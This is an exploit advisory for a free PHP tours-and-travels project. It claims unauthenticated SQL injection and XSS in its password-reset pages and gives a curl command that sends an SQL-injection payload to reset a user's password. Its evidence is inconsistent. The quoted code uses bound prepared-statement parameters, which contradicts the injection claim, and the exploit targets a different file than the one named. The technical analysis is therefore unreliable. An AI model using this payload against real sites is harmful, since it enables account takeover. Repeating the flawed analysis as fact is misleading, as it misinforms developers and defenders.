# Exploit Title: online-tours-travels-project Multiple Vulnerabilities # Date: 23-02-2025 # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-tours-travels-project-php/ # Software Link: https://github.com/projectworldsofficial/Tours-and-travels-in-php # Description: The SQLi and the XSS are unauthenticated and in forgot-password.php # Tested on: Ubuntu 24.04.2 LTS, XAMPP, Apache, MySQL in this file : https://github.com/projectworldsofficial/Tours-and-travels-in-php/blob/master/forgot-password.php [Unauthenticated SQL Injection ] When updating the password, the query is not sanitized or validated properly. $email=$_POST['email']; $mobile=$_POST['mobile']; $newpassword=md5($_POST['newpassword']); $sql ="SELECT EmailId FROM tblusers WHERE EmailId=:email and MobileNumber=:mobile"; $query= $dbh -> prepare($sql); $query-> bindParam(':email', $email, PDO::PARAM_STR); $query-> bindParam(':mobile', $mobile, PDO::PARAM_STR); $query-> execute(); $results = $query -> fetchAll(PDO::FETCH_OBJ); exploit : curl --location 'localhost/Tours-and-travels-in-php/reset-password.php' \ --header 'Content-Type: application/x-www-form-urlencoded' \ --data-urlencode '[email protected]\'; -- ' \ --data-urlencode 'mobile=1234567890' \ --data-urlencode 'newpassword=newpassword' [Cross Site Scripting] XSS vulnerability is present in input fields email & mobile where user input is directly reflected back in the output without proper encoding.